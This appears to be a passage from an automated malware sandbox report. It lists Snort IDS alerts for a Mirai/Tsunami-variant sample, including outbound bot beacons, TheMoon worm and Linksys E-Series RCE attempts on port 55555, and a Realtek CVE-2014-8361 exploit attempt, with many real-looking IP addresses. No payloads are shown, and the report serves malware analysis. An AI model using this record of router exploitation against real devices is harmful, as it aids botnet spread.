    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58356 -> 95.100.242.136:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.21.106:80 -> 192.168.2.23:42288
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42754 -> 88.156.75.58:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.47.91:80 -> 192.168.2.23:38514
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53412 -> 95.154.197.181:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34324 -> 95.81.98.158:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.87.188:80 -> 192.168.2.23:59360
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59360 -> 88.221.87.188:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.173.116:80 -> 192.168.2.23:45626
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45626 -> 95.101.173.116:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44672 -> 95.159.32.62:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.221.35:8080 -> 192.168.2.23:53550
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54608 -> 88.218.117.56:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.254.95:80 -> 192.168.2.23:50876
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50876 -> 88.221.254.95:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.222.141:80 -> 192.168.2.23:56500
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.169.50:80 -> 192.168.2.23:39216
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39216 -> 95.100.169.50:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51976 -> 95.248.114.214:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47956 -> 88.119.98.49:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.71.17:80 -> 192.168.2.23:44718
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.25.104:80 -> 192.168.2.23:45066
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38444 -> 95.141.40.219:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44626 -> 88.221.9.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48284 -> 88.42.123.82:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56604 -> 112.186.180.174:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58872 -> 112.169.69.164:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43240 -> 95.26.196.188:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44696 -> 88.221.9.171:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.36.39:8080 -> 192.168.2.23:49426
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42742 -> 112.140.176.40:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35072 -> 112.199.113.142:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.179.41:8080 -> 192.168.2.23:48902
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.16.92:8080 -> 192.168.2.23:49340
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53878 -> 88.99.97.194:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60006 -> 88.99.185.10:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42822 -> 88.99.193.177:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42882 -> 88.205.28.158:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58174 -> 88.212.197.230:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.6.96:80 -> 192.168.2.23:55370
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55370 -> 88.221.6.96:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39658 -> 88.164.124.218:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53528 -> 88.87.68.204:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.191.24:8080 -> 192.168.2.23:40492
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.6.96:80 -> 192.168.2.23:55426
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41956 -> 88.198.15.15:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50376 -> 88.86.124.220:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40778 -> 88.147.129.187:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.143.229:80 -> 192.168.2.23:46216
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44024 -> 88.221.131.208:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.223.243:80 -> 192.168.2.23:36178
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.211.92:80 -> 192.168.2.23:51224
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38458 -> 95.130.59.100:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.209.61:8080 -> 192.168.2.23:44938
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48522 -> 112.147.103.75:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43048 -> 88.221.207.166:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52634 -> 112.210.155.183:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.172.195:8080 -> 192.168.2.23:42206
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48756 -> 88.198.40.80:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57142 -> 112.187.44.208:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.87.243:8080 -> 192.168.2.23:48332
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.204.220:8080 -> 192.168.2.23:55086
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49620 -> 95.97.26.243:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.178.142:80 -> 192.168.2.23:36492
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39522 -> 95.158.187.227:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33048 -> 112.186.220.118:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60868 -> 95.239.152.64:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.197.162:8080 -> 192.168.2.23:33378
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39084 -> 88.196.99.114:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47940 -> 88.152.12.58:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54428 -> 172.65.192.56:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54428 -> 172.65.192.56:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54428 -> 172.65.192.56:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34018 -> 172.65.247.142:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59770 -> 172.65.199.248:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55118 -> 172.65.41.222:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59500 -> 172.247.3.150:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39910 -> 172.245.25.2:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33592 -> 88.116.234.70:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37928 -> 88.209.198.204:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36284 -> 88.99.169.45:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49544 -> 88.209.236.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39574 -> 112.167.7.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54088 -> 112.214.76.152:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44946 -> 112.163.33.145:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.208.120.46:8080 -> 192.168.2.23:59390
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.36.145:8080 -> 192.168.2.23:41856
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50108 -> 88.221.186.179:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48634 -> 112.78.47.117:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60054 -> 172.65.137.211:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42076 -> 88.221.36.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41282 -> 95.101.222.173:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55554 -> 95.221.137.251:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.55.65:80 -> 192.168.2.23:51482
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.4.158:80 -> 192.168.2.23:45180
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55902 -> 95.171.45.43:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.94.198:80 -> 192.168.2.23:52016
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.220.80:80 -> 192.168.2.23:53678
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.28.202:80 -> 192.168.2.23:50174
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36916 -> 88.249.249.14:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60072 -> 112.206.20.145:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35618 -> 88.99.16.245:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50020 -> 172.65.219.244:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.232.165:80 -> 192.168.2.23:49112
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.216.59:80 -> 192.168.2.23:55556
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55556 -> 88.221.216.59:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54294 -> 88.153.161.205:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54966 -> 88.193.198.54:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.34.28:80 -> 192.168.2.23:51298
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42232 -> 172.65.130.16:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:40308 -> 172.65.74.80:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59874 -> 95.110.199.24:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40688 -> 95.217.111.228:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42288 -> 95.100.21.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49338 -> 95.57.136.37:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 85.209.136.167:8080 -> 192.168.2.23:50412
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36450 -> 172.65.206.162:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50266 -> 172.65.232.78:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50994 -> 172.65.102.149:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59318 -> 172.87.239.156:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41280 -> 156.241.13.56:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34278 -> 95.169.213.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33866 -> 88.208.43.5:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56272 -> 95.9.5.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59904 -> 95.251.172.52:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38514 -> 95.101.47.91:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46704 -> 95.213.151.210:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48776 -> 95.73.4.31:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39398 -> 95.161.130.41:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47862 -> 172.65.241.250:55555
    Connects to many ports of the same IP (likely port scanning)
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 37776 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55514 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55454 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 49552
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57526 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60374 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 57526
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56110 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55988 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40554 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33074 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49050 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
